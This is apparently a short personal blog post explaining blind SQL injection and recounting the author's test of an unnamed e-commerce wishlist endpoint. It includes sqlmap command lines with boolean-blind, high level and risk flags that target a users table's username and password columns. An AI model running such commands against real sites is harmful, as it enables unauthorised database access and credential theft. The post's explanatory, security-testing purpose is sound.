Blind SQL Injection

2 min readJan 11, 2020

Hello guys, this is my first medium blog. I’m going to explain about blind SQL injection and how I found it on one of the e-commerce website.

Summary :

Blind SQL Injection is used when there is No Output and No Error from the web application, that means we cant inject the Union based injection in which we use to get the output nor we can Inject the XPATH or Sub Query Injection which use to get the output in form of Error. While doing a Blind injection we make Queries from the database and ask if we are right or wrong.

While testing for normal SQL Injection I thought of trying Blind SQL. So at first I used some payloads to detect Blind SQL and it gave me en error of 403 Forbidden, then I used the fuzzing technique using burp suite and it didn’t work too, so now the only option left was SQLMAP I used sqlmap but it failed too.

POC :

Vulnerable Parameter : product=648684

Request :

Payload for 1st detection : sqlmap -u “https://www.example.com/advancedwishlist/index/add/product/648684/<key>” --dbs --dump

This didn’t work so I used different flags of sqlmap for Blind Sql Injection

Payload for 2nd detection : sqlmap -u “https://www.example.com/advancedwishlist/index/add/product/648684/<key>” --data “product=648684” --technique=B --dump --level=5 --risk=3 -T users -C username,password

--technique (Blind)

-C (DBMS database column(s) to enumerate)

-T (DBMS database table column(s) to enumerate)

--dump (Dump DBMS database table entries)

--level (level of tests to perform (1 to 5, default 1))

--risk (risk of tests to perform (1 to 3, default 1))

It worked but I was able to retrieve only the database name, its version and the web application technology used by the website.